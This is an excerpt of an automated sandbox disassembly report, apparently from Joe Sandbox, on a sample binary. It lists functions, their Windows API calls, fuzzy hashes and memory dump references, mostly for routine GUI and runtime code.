Opcode Fuzzy Hash: 1b138b72f1a0bde290e2f3c08c71d46254b2f470239595298abece24acf37baf
Instruction Fuzzy Hash: DE119DF2910A00ABCA20DF59DC01A9BF7EDEB50710F544A2AE816C3780E771EA108E92

Function 001EF3CD Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001EF3D4
GetWindowRect.USER32(?,?), ref: 001EF415
CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 001EF43F
SetWindowRgn.USER32(?,?,00000000), ref: 001EF455

Part of subcall function 001CDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 001CDC99

SetWindowRgn.USER32(?,00000000,00000000), ref: 001EF471

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$CreateH_prolog3_H_prolog3_catch_Round
String ID:
API String ID: 4273792742-0
Opcode ID: a7cc7f8d30729608f16e02b43f398d82c22ad20c9c2840b5c024f2a450a54197
Instruction ID: 79bd6b9d73f4c7b575b3ebe917ac97fe24bf097a465da896a201912bfa96267b
Opcode Fuzzy Hash: a7cc7f8d30729608f16e02b43f398d82c22ad20c9c2840b5c024f2a450a54197
Instruction Fuzzy Hash: CE112C71800649DFCB21DFA6C889DEEFBB4FF88700F55022EE586A62A0DB715901DF24

Function 001D0D9F Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 001D0DCB
_memset.LIBCMT ref: 001D0DE9
GetWindowTextW.USER32(00000000,?,00000100), ref: 001D0E03
lstrcmpW.KERNEL32(?,?,?,?), ref: 001D0E15
SetWindowTextW.USER32(00000000,?), ref: 001D0E21

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: c6070137863898466e1be3f5a2263e654c72bca0c12f51ba0b1fc80242dd8332
Instruction ID: 2a92b3e2e549ec56cf4df6d50b2c878d6095456da21e2589caa6305d58b17ed8
Opcode Fuzzy Hash: c6070137863898466e1be3f5a2263e654c72bca0c12f51ba0b1fc80242dd8332
Instruction Fuzzy Hash: D80161B6501219A7CB11ABB5AD88ADFB3ACEB4C750F004466F945D7242EB30D9448BA5

Function 0024C168 Relevance: 7.6, APIs: 5, Instructions: 53threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0024C16F
EnterCriticalSection.KERNEL32(00336EB4,00000000,001EC29A,00000001), ref: 0024C1CB
__beginthread.LIBCMT ref: 0024C1E5
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0024C1FE
LeaveCriticalSection.KERNEL32(00336EB4), ref: 0024C215

Part of subcall function 001D800E: __EH_prolog3.LIBCMT ref: 001D8015

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalH_prolog3Section$EnterLeavePriorityThread__beginthread
String ID:
API String ID: 4118814795-0
Opcode ID: b5055a573aeb5420d764f6d799d6ba82f8c80a46500b863bd973f801cce857f2
Instruction ID: dc47f3bbba0d80c5367e47521fa0daae9048b71ce5fe31fbe597d8fe8e8e6b0a
Opcode Fuzzy Hash: b5055a573aeb5420d764f6d799d6ba82f8c80a46500b863bd973f801cce857f2
Instruction Fuzzy Hash: 67119474421211EFCB6ADF78EDCA44A3A68AB01B70F344329F869562E1CBF04996CF50

Function 00206BF7 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 00206C1D
PostMessageW.USER32(?,00000367,00000000,00000000), ref: 00206C35
GetCapture.USER32 ref: 00206C37
ReleaseCapture.USER32 ref: 00206C42
PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00206C70

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: 855da26d567161444b54f484da6f2bc353b6cc67b3503dfc66ac70a4f517597c
Instruction ID: 6565af89d5c6178d640fbcaa56c0354c049e1c4eb533ac160c5749567e0569f9
Opcode Fuzzy Hash: 855da26d567161444b54f484da6f2bc353b6cc67b3503dfc66ac70a4f517597c
Instruction Fuzzy Hash: 7201A7711103416BE7256B30DC8DF5B76BCFB84704F50452DF5C996191EE70E8508B64

Function 0021C58F Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 0021C59E
SendMessageW.USER32(?,00000366,00000000,?), ref: 0021C5BA
ClientToScreen.USER32(?,?), ref: 0021C5C7
GetWindowLongW.USER32(?,000000F0), ref: 0021C5D0
GetParent.USER32(?), ref: 0021C5DE

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreen$LongMessageParentSendWindow
String ID:
API String ID: 4240056119-0
Opcode ID: 2aca15d708b9a115cc54477baab193c3e60570d48252bd45d03c5be63f83008e
Instruction ID: 0f877a3e4a4c0df366b0cc4e52ed3a4e28c115112977863d9c5721782d03da09
Opcode Fuzzy Hash: 2aca15d708b9a115cc54477baab193c3e60570d48252bd45d03c5be63f83008e
Instruction Fuzzy Hash: CEF0D13A19056577E3110F19AC08AEB77ADEF95771F304211FD29EA180DF70EE5182A4

Function 0020F55B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 0020F571
ScreenToClient.USER32(?,00000000), ref: 0020F57E
PtInRect.USER32(?,00000000,00000000), ref: 0020F591
LoadCursorW.USER32(00000000,00007F86), ref: 0020F5B0
SetCursor.USER32(00000000), ref: 0020F5BC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Cursor$ClientLoadRectScreen
String ID:
API String ID: 2747913190-0
Opcode ID: 79da7c3e62e3a57e05aeaff3b2b4ea3a7f57aa1e9c2ed47972ce8828cb8d771b
Instruction ID: ffe6ea956b43608ed2731731dbfe48e14947c74e5efefdfa143cd7906e9199c2
Opcode Fuzzy Hash: 79da7c3e62e3a57e05aeaff3b2b4ea3a7f57aa1e9c2ed47972ce8828cb8d771b
Instruction Fuzzy Hash: 81015A72950249BFDB20AFA0EC4CFAE7FB9FB08345F404429B95AD6060DB70DA50DB20

Function 001F75FD Relevance: 7.5, APIs: 5, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001F7619
_memset.LIBCMT ref: 001F7633
GetKeyboardLayout.USER32(?), ref: 001F7643
MapVirtualKeyW.USER32(?,00000000), ref: 001F7661
ToUnicodeEx.USER32(?,00000000), ref: 001F766B

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Keyboard$Exception@8H_prolog3LayoutStateThrowUnicodeVirtual_memset
String ID:
API String ID: 4204171240-0
Opcode ID: a0a54cfdf38ccf26c3d0806585dff6da37fc4bba74b1764db5b87674c08b6c4f
Instruction ID: e8e10c3dc8342980cf6de43893147dcfba3ccf24c2acc22548db053c02d7e974
Opcode Fuzzy Hash: a0a54cfdf38ccf26c3d0806585dff6da37fc4bba74b1764db5b87674c08b6c4f
Instruction Fuzzy Hash: 76016771640108BFDF10AB64ED8AFDE77ACAF14700F8140A9B645DA091DF70DA94CF54

Function 002C5B5B Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 002C5B67

Part of subcall function 002C5DC1: __getptd_noexit.LIBCMT ref: 002C5DC4
Part of subcall function 002C5DC1: __amsg_exit.LIBCMT ref: 002C5DD1

__getptd.LIBCMT ref: 002C5B7E
__amsg_exit.LIBCMT ref: 002C5B8C
__lock.LIBCMT ref: 002C5B9C
__updatetlocinfoEx_nolock.LIBCMT ref: 002C5BB0

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 9a7840e8045ebd46165e9b01cfaf4d3e3e3cb007c9aa5c179faca296b1ceb24a
Instruction ID: 2d3819ee91aaaec66f1287dfbf2831da3531e58e6c3a1c531799ed4a3547061c
Opcode Fuzzy Hash: 9a7840e8045ebd46165e9b01cfaf4d3e3e3cb007c9aa5c179faca296b1ceb24a
Instruction Fuzzy Hash: 61F06231924F319BD7617BA89806F4E2BA0AF00764F10470DF505561D6CB64FDA18E55

Function 001C5350 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 494COMMON

Download Yara Rule

APIs

Part of subcall function 001C7F90: std::_Lockit::_Lockit.LIBCPMT ref: 001C7FA4

Part of subcall function 001C6960: std::_Lockit::_Lockit.LIBCPMT ref: 001C698C
Part of subcall function 001C6960: std::_Lockit::_Lockit.LIBCPMT ref: 001C69AF

std::_Lockit::_Lockit.LIBCPMT ref: 001C53D9
_localeconv.LIBCMT ref: 001C544F
_strcspn.LIBCMT ref: 001C556A

Strings

e, xrefs: 001C5462

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$_localeconv_strcspn
String ID: e
API String ID: 331173946-4024072794
Opcode ID: 3f88a4555d92fc36daf53f98888b6aaf7c3eb0e070442ad99be655dc262e973c
Instruction ID: 7d6b81459fd880b8d559b800a69a390a922c9c998471592d0b08c54048addc45
Opcode Fuzzy Hash: 3f88a4555d92fc36daf53f98888b6aaf7c3eb0e070442ad99be655dc262e973c
Instruction Fuzzy Hash: 78122775E006588FCB14CFA8C881AEEBBB6BF98300F15825DE819AB355D730ED45CB94

Function 0026FBEF Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 432COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0026FBF6
IsRectEmpty.USER32(?), ref: 00270015
OffsetRect.USER32(?,00000000,00000001), ref: 00270051

Strings

!, xrefs: 0026FE9B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$EmptyH_prolog3_Offset
String ID: !
API String ID: 307044148-2657877971
Opcode ID: 6be4d3c1b9b5af759e864ed4eb9bc1f3526ad6a759b00dbfceac15990ef365ac
Instruction ID: e95cdc0934ff8f6312c7b8402c5c6e21d19d9ff5720f9ca18a7a116c0e9e7b2c
Opcode Fuzzy Hash: 6be4d3c1b9b5af759e864ed4eb9bc1f3526ad6a759b00dbfceac15990ef365ac
Instruction Fuzzy Hash: 18028D71A1021ACFCF10DFA4C985AEEBBB9FF19300F14416AE806EB255DB70A955CF50

Function 002672A2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

OffsetRect.USER32(-00000018,00000000,00000000), ref: 0026737F
__EH_prolog3.LIBCMT ref: 002673A2
GetSystemMetrics.USER32(00000002), ref: 0026740F

Part of subcall function 001DEAAD: __EH_prolog3.LIBCMT ref: 001DEAB4

Strings

N%, xrefs: 0026756C

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$MetricsOffsetRectSystem
String ID: N%
API String ID: 1613555380-2073099716
Opcode ID: 9f7b6bf70398fdadba63845cb8ac763d6bbd98886599bcca67c97c0e03c45d59
Instruction ID: ccfca1d22d49254f4c61ce0a5208473bcc2c8f285ee41a4f50b69de8992f6309
Opcode Fuzzy Hash: 9f7b6bf70398fdadba63845cb8ac763d6bbd98886599bcca67c97c0e03c45d59
Instruction Fuzzy Hash: 23A16A31A1074ADFCB10DFA8D889AAEB7F1FF54318F24456DE816AB251DB70A990CF50

Function 0021831B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00218322
SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0021834F
GetWindow.USER32(?,00000005), ref: 002183B9

Part of subcall function 002185BF: BringWindowToTop.USER32(?), ref: 00218651
Part of subcall function 002185BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00218690
Part of subcall function 002185BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 002186A0

Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66

Strings

83/, xrefs: 002183F5, 0021853C, 0021857F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Redraw$BringH_prolog3MessageSendShow
String ID: 83/
API String ID: 603925361-2323854675
Opcode ID: 3a66461f6aff3f5c8178223f52b74e0bf3d3ab81805c6da7090f575bf4a04204
Instruction ID: 20b77bb6b1378061f0f3bb9e4dccd79879ea013c3e898e56e30e5e031be54cf9
Opcode Fuzzy Hash: 3a66461f6aff3f5c8178223f52b74e0bf3d3ab81805c6da7090f575bf4a04204
Instruction Fuzzy Hash: 5971A130A21216AFCF15AF60C8C99EDB7A6FF64B10F15446AF805AB295DF709D90CBD0

Function 001C4AC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 001C4C87

Strings

%, xrefs: 001C4C0D
$, xrefs: 001C4B18
+, xrefs: 001C4C1B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 0fd19c34f53649e6baf91df036304a9235c57187e7201f3fa3c7b2a9c3d5ab86
Instruction ID: 580a705d2d44a7abe33585d34969b3bbf8b740415b922f451bd4235813bba13f
Opcode Fuzzy Hash: 0fd19c34f53649e6baf91df036304a9235c57187e7201f3fa3c7b2a9c3d5ab86
Instruction Fuzzy Hash: F9519C72A0D3005BD7199E48C9A0FEB7BE8EB65350F21994CF981932A2E775CC448BC6

Function 001C4CD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 001C4E85

Strings

%, xrefs: 001C4E0B
+, xrefs: 001C4E19
$, xrefs: 001C4D28

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 9d68cae6fc9f3c5010d395a19cb8f3ac65804f13db4bdcf934dd42e33ca8318e
Instruction ID: 34ecf76c150720b6ab24fe4a70c9b189c69f5033c9464ce6e1bbd60973e59855
Opcode Fuzzy Hash: 9d68cae6fc9f3c5010d395a19cb8f3ac65804f13db4bdcf934dd42e33ca8318e
Instruction Fuzzy Hash: 29515D72A0C3005BD719AE98C9A4FFB7BE4AB75750F11994CF99283291D739CC4487C2

Function 001FF686 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FF6C2
GetWindowRect.USER32(?,?), ref: 001FF75F
IsRectEmpty.USER32(?), ref: 001FF769

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

X/, xrefs: 001FF6DF, 001FF6F4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EmptyException@8H_prolog3Throw
String ID: X/
API String ID: 2711673171-1961195256
Opcode ID: f7e0c945be0a190b0fc91febbbe4ecab74b7a8ae61b02e86dcee40fe0453eb6c
Instruction ID: 30eb7c5bee62037dde686e67d871eb78951586681d83477383f69bc57393dfe9
Opcode Fuzzy Hash: f7e0c945be0a190b0fc91febbbe4ecab74b7a8ae61b02e86dcee40fe0453eb6c
Instruction Fuzzy Hash: C7610070A0020A9FCB15DFA9C588AFEBBF5BF48340F244169E615E7250DB70AE42CB64

Function 00216E9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00216F64
